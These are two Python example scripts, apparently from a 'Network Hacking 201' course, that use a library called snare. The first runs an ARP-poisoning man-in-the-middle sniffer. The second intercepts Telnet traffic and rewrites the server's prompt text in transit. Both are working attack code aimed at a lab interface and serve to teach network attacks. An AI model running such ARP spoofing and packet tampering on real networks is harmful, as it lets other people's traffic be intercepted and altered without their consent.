Snare examples 1 and 2 from Network Hacking 201

snare_ex_1.py

import snare

def show_pkt(pkt):
    print(pkt.summary())
    return pkt

sniffer = snare.Sniffer(
    iface='tap0',
    modules=[snare.ArpMitmModule(filter=show_pkt)]
)
sniffer.start()
# Here you will start to see packet summaries for intercepted traffic.
# When you want to stop the ARP poisoning attack and sniffer, run:
sniffer.stop()

snare_ex_2.py

import scapy.all as scapy
import snare

# Mark this as a TCP filter. Modified TCP packets returned from this function
# will have seq and ack numbers automatically adjusted.
@snare.tcpfilter
def telnet_filter(pkt):
    # Only look at packets which have a TCP layer and a non-empty payload.
    if not all(layer in pkt for layer in (scapy.IP, scapy.TCP, scapy.Raw)):
        return pkt

    # Print some information about the packet. Check Wireshark for the full details.
    print(pkt.sprintf(f'%IP.src%:%TCP.sport% > %IP.dst%:%TCP.dport% {len(pkt[scapy.Raw].load)} bytes'))

    # Check if packet is going from Telnet server to client.
    if pkt[scapy.TCP].sport == 23:
        # Replace the prompt shown to the user in the terminal.
        # Instead of "piggy@", show "hacked@".
        if b'piggy@' in pkt[scapy.Raw].load:
            print('Replacing user prompt: HACKED!')
            pkt[scapy.Raw].load = pkt[scapy.Raw].load.replace(b'piggy@', b'hacked@')

    # Return the, possibly modified, packet for forwarding.
    return pkt

sniffer = snare.Sniffer(
    iface="tap0",
    modules=[snare.ArpMitmModule(filter=telnet_filter)]
)
# Run the sniffer in blocking mode.
sniffer.run()